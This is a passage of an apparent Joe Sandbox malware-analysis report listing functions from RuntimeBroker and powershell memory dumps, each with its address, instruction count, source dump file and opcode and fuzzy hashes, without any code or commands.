                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 26a8501ae834834412e0c0c13ae84d51824685b8b6767f734d696f94e01f0c30
                          • Instruction ID: 56c32b15362db2d033b394d10b79aef3e34ea3a19e6be03dc2b33642c834ad39
                          • Opcode Fuzzy Hash: 26a8501ae834834412e0c0c13ae84d51824685b8b6767f734d696f94e01f0c30
                          • Instruction Fuzzy Hash: 8D318032B1CD4A5FE695F32C041567966D2EFD8680F9800BAD10EC72D6FF2CE9014789
                          Function 00007FF848F10855 Relevance: .1, Instructions: 106COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 404d0b89501b918350568dc625bfa77ff415af44cda3df588165919abeee8edc
                          • Instruction ID: c6046bc2521423cce860ea6668517a32ece5a22e7ecce89bf383324dc179a52e
                          • Opcode Fuzzy Hash: 404d0b89501b918350568dc625bfa77ff415af44cda3df588165919abeee8edc
                          • Instruction Fuzzy Hash: AF310E31D1DAA54FEB91B73C94656A43BE0EF96360F1800BAC84CCB1E3CA18AC458385
                          Function 00007FF848FD36A8 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8e94108602f7c316c52b93a9f5455604ff4f8bf7b9502977c5d9ab4c89fe175a
                          • Instruction ID: 38e31cb4a3e5d0881dbf04e52e5fe90d46ee6a5b2dae523183c89c8c0cce197a
                          • Opcode Fuzzy Hash: 8e94108602f7c316c52b93a9f5455604ff4f8bf7b9502977c5d9ab4c89fe175a
                          • Instruction Fuzzy Hash: E731D17291DE8A5FE781F72C4415576BBE1EF99280F1804BAE14EC32D1FE29E8018746
                          Function 00007FF848FD6A62 Relevance: .1, Instructions: 98COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0b40bc19bec4d982c687b6b0cbff768f1fb241d89b1f36127593ff97f2dda46
                          • Instruction ID: 6be20244f4424f6ba587ab4f466f372eb5971dfceec72cc7b5b2f3cd413c420f
                          • Opcode Fuzzy Hash: a0b40bc19bec4d982c687b6b0cbff768f1fb241d89b1f36127593ff97f2dda46
                          • Instruction Fuzzy Hash: CD21AF31B1D94B4FE6A6BB2C245127962C2EF992D0F5511BAC54FC72C6EF1DAC030689
                          Function 00007FF848F10A1A Relevance: .1, Instructions: 90COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 269c1e345773b9da05603b071e7c6751ae2e89159f1e6e6472cb24e679abf138
                          • Instruction ID: e31ff6459c001fb6477206e05e667e6e5331197d0d80066f2f24eef1d902e1ec
                          • Opcode Fuzzy Hash: 269c1e345773b9da05603b071e7c6751ae2e89159f1e6e6472cb24e679abf138
                          • Instruction Fuzzy Hash: AA211931F1C82A5FEB98FB6894567BDB2E2EF88740F444179E50DD32C6CE286C014785
                          Function 00007FF848F10847 Relevance: .1, Instructions: 90COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f1786b973873abc70f78e2301e5040ed10875e16510c009482be8b24193dfaa
                          • Instruction ID: 228d943de3b3caac4484ea3fd639cda370f9c507824da531cf0c9803466c254c
                          • Opcode Fuzzy Hash: 7f1786b973873abc70f78e2301e5040ed10875e16510c009482be8b24193dfaa
                          • Instruction Fuzzy Hash: CD21F436A1D5658FEB54F73C90656E53BD0FF993A4B0401BAD44DCB2D2DA28AC428744
                          Function 00007FF848F108A1 Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: abda700d90e6ca87b546241421a859b24f19f2431985b59265cc0ad7b77cc1ae
                          • Instruction ID: 6799eb4b792f0a9e29aa7638dac6e39f944740f1cb08f7e7454272a7a470ec56
                          • Opcode Fuzzy Hash: abda700d90e6ca87b546241421a859b24f19f2431985b59265cc0ad7b77cc1ae
                          • Instruction Fuzzy Hash: F2210232A1CAA94FEB94F73C84696647BE0EF99350B4501FAD84DC72E3DA19EC428701
                          Function 00007FF848F10B89 Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e91500f71e1faf749d19d84961026596e8b71fee05863ad4c572e8bb9f1f0ff
                          • Instruction ID: f132eda185c6b1c013274c8d8e5e58bafc4d2b00a625b0290aaaf94924c158e2
                          • Opcode Fuzzy Hash: 5e91500f71e1faf749d19d84961026596e8b71fee05863ad4c572e8bb9f1f0ff
                          • Instruction Fuzzy Hash: 5811A93198E1A11FD31767342C238E27F64DF42368B0901E7E459C74D3DA0C1A9787A6
                          Function 00007FF848F13BA8 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7cd3cada24444a8ea42a1757a7ba07cdfb6890c312a8856646738b9bd05d2451
                          • Instruction ID: d4ff8202b4aa19a8c5bd0b6a96a8dbb7feb91b9bb2cf50bfcd93cb6991f66fa9
                          • Opcode Fuzzy Hash: 7cd3cada24444a8ea42a1757a7ba07cdfb6890c312a8856646738b9bd05d2451
                          • Instruction Fuzzy Hash: B8F06D31A0C92A9FE694F718C4996B933D2EB98350F550679D80EC32D2DF2CAC428788
                          Function 00007FF848F1600E Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 81b5a9a9aa319a0eaf3f4d9e388ff055ec62feb39ebe6bfdf1c13ce61e7a6620
                          • Instruction ID: a03e39c1438b8a34f8a32e2b0b5d575d8ee3bc8a259eea1e1806036db94937f0
                          • Opcode Fuzzy Hash: 81b5a9a9aa319a0eaf3f4d9e388ff055ec62feb39ebe6bfdf1c13ce61e7a6620
                          • Instruction Fuzzy Hash: 21F04931E0C96A5FE394F72884992B927D2AB89390F4445B9D80DC72C2CF2CAC468B49
                          Function 00007FF848F6C078 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16ab38c6636b3ac5e8f9793efcbcf62e9130f121bdb4586d2997a8c27810ec74
                          • Instruction ID: 5eeb0813fe26ef6a8a0c5f11f821a97c42250555c539b3b9cfe972bc40e9d402
                          • Opcode Fuzzy Hash: 16ab38c6636b3ac5e8f9793efcbcf62e9130f121bdb4586d2997a8c27810ec74
                          • Instruction Fuzzy Hash: D3E09B34718B484B8B18EA1D9445476F7D1EB99305F44066EA49BD3360DE20FC418785
                          Function 00007FF848F6C050 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1dce7d4d1eb695cba24817b98985f0e24cb90984306f217899f21b3ecd0d4757
                          • Instruction ID: 673c45feedd3ac9d99fa0f0ef1d0396b081ba2b6d8125a6f305d04ed00ea6bee
                          • Opcode Fuzzy Hash: 1dce7d4d1eb695cba24817b98985f0e24cb90984306f217899f21b3ecd0d4757
                          • Instruction Fuzzy Hash: 07E0C230B64A580B9B6CA66E5445471B3D5C79A206344427FA89BC32D5EC14FC864688
                          Function 00007FF848F10FE0 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8e01b3a99c97260d0636551cf1b653ddf4cb342f0d7b54db29a357633dc145e1
                          • Instruction ID: b273dffd200615112b311d3e72647dfb31f690663a229474736f0450e640c182
                          • Opcode Fuzzy Hash: 8e01b3a99c97260d0636551cf1b653ddf4cb342f0d7b54db29a357633dc145e1
                          • Instruction Fuzzy Hash: 9CE09A3385D6999ED2263728A8020FA7B24FF91754F040277F84CC60C2DE082969829A
                          Function 00007FF848F132CF Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8cc7f120fc26390903c43874fb2e89e5ab27d0e137a5363dc5044acb9dab7efa
                          • Instruction ID: 48b785c936321de32d33e1ac253dc96431c4c09c7d48a57337621fa2b6f812f6
                          • Opcode Fuzzy Hash: 8cc7f120fc26390903c43874fb2e89e5ab27d0e137a5363dc5044acb9dab7efa
                          • Instruction Fuzzy Hash: 59F06D71E1C86A5EF6A0B328809937912C2EB887A0F540579D80DD33C3DF2CAC828749
                          Function 00007FF848F194E0 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 475ed9e24a1dd14f7d9f6e35bbce30a1db79d49a7a8c4ee1814d24d9e1eb22ed
                          • Instruction ID: 88a1b7c3d4d0c10f20dac81e4aaa626aae1753d668418bc4035b6442321a10de
                          • Opcode Fuzzy Hash: 475ed9e24a1dd14f7d9f6e35bbce30a1db79d49a7a8c4ee1814d24d9e1eb22ed
                          • Instruction Fuzzy Hash: 57E0E534A1991D4FDB88F76D845563526D2FB98350F800175D409C33C5DE1CD8518740
                          Function 00007FF848F10FE8 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b924b18d6177b970fd20c532a3d6d243b4f526fd2db238d65785931690cc7d53
                          • Instruction ID: eddce0913e019e7d81cdc55dad3528c06985ad4d4ce457cb7443f58c9d81da67
                          • Opcode Fuzzy Hash: b924b18d6177b970fd20c532a3d6d243b4f526fd2db238d65785931690cc7d53
                          • Instruction Fuzzy Hash: 15E08C32C5C6899EE665377468020F67B24FF56744F040272F85CC60C3AE082D68815A
                          Function 00007FF848F1095D Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22acc2d97375639b90af1a93a6fc3586342db47255eb8fc1b615b206002f5e41
                          • Instruction ID: 113c34c8bfa0aeb95d49fdc3d4abfc877f0f2e8b9a04ab378016d1bc08b3cb9c
                          • Opcode Fuzzy Hash: 22acc2d97375639b90af1a93a6fc3586342db47255eb8fc1b615b206002f5e41
                          • Instruction Fuzzy Hash: CDE02621C0EB990FE36573B814BA1A47ED0DF45340F8500FAD448CA1D7EE199CC18345
                          Function 00007FF848F10FC5 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca44028ea61f9393cea3569283b5e69f34069442c8e005c7d94422cd3b00f24f
                          • Instruction ID: b02f5d28130dce32f990ef1b49d3a35c39fcf883f545b968ac5133facdbdc2a4
                          • Opcode Fuzzy Hash: ca44028ea61f9393cea3569283b5e69f34069442c8e005c7d94422cd3b00f24f
                          • Instruction Fuzzy Hash: B5D02E3BA0824D0BE3023228E8033E93380EFC03A9F460072DA888E0C2A718090B8068
                          Function 00007FF848F10F70 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 801cc410c9182bf51792b6425af1809bba6feae45afb9a270d20e73c047da0b3
                          • Instruction ID: 9bae9cbb796aa3f67be0197057bd753a1f46ab231b59f111d995674896de8ec5
                          • Opcode Fuzzy Hash: 801cc410c9182bf51792b6425af1809bba6feae45afb9a270d20e73c047da0b3
                          • Instruction Fuzzy Hash: 8CB01230C6F70B89D9793331084246471A0EFC5354FF401B4D80C442C5DA6F98D5C3C6
                          Function 00007FF848F1650D Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a2463d65835c1b86fae9c7b7efa440fe16dc80437b4aa78db3b40879f9544116
                          • Instruction ID: 063b254d3e94e7e493b2f065d60269b04ff1f867d36f8062844cdcc493de0791
                          • Opcode Fuzzy Hash: a2463d65835c1b86fae9c7b7efa440fe16dc80437b4aa78db3b40879f9544116
                          • Instruction Fuzzy Hash: 23B01271C0C43A4EE630770480883B513E2DF18391F0402B2D40C932C2CB2C1C825748

                          Non-executed Functions

                          Function 00007FF848F11351 Relevance: 3.0, Strings: 2, Instructions: 527COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID: /O_^$0O_^
                          • API String ID: 0-2797207476
                          • Opcode ID: 773a05e27ca5d5eab04e6834c2e443d038a5c5e474bdc30678f932d48285cd80
                          • Instruction ID: bb6ce1327b659db15c2b1d574e380d95c774a229cf57e8dcf55631aeceb7174f
                          • Opcode Fuzzy Hash: 773a05e27ca5d5eab04e6834c2e443d038a5c5e474bdc30678f932d48285cd80
                          • Instruction Fuzzy Hash: 4EF1183290D6C68FE755BB2CA8552F53BA0FF52764F0801BBD48DCB1D3DA18AC868395
                          Function 00007FF848F1102A Relevance: .2, Instructions: 250COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a5a065d4ae7d06ea1037081533f2555021d8a5ff0e0c6cf738debef6959a9b05
                          • Instruction ID: 8de26bd2b65d8127ad6d6512a47bda92e46f6f27fcf468dd38d47956b5fd3e7b
                          • Opcode Fuzzy Hash: a5a065d4ae7d06ea1037081533f2555021d8a5ff0e0c6cf738debef6959a9b05
                          • Instruction Fuzzy Hash: 9F818871E18A4D9EE788EF2C88993ADBBE1FBA9350F40017AD00DD32D6DF7858468750

                          Executed Functions

                          Function 00007FF849002A25 Relevance: .4, Instructions: 429COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2234278256.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ff849000000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a68a62e3b278c01e72f3b3a184588ab2ff6e7b03b7fd6cac21b4a6d53152afb
                          • Instruction ID: a4227554938a1a9c304c4ab244f0be667f45cf23de6e9e683f34686055a70f57
                          • Opcode Fuzzy Hash: 7a68a62e3b278c01e72f3b3a184588ab2ff6e7b03b7fd6cac21b4a6d53152afb
                          • Instruction Fuzzy Hash: 1BD1F131D1EACA5FEBA5AF2C68546B5BBA1FF46390F1800FAD04DC7193EA18E805C351
                          Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2233897468.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ff848f30000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fcff5be8bdf8f46413ce9b98e0f33ca78ada77430d9ac11dc21ae12f696e88e5
                          • Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
                          • Opcode Fuzzy Hash: fcff5be8bdf8f46413ce9b98e0f33ca78ada77430d9ac11dc21ae12f696e88e5
                          • Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45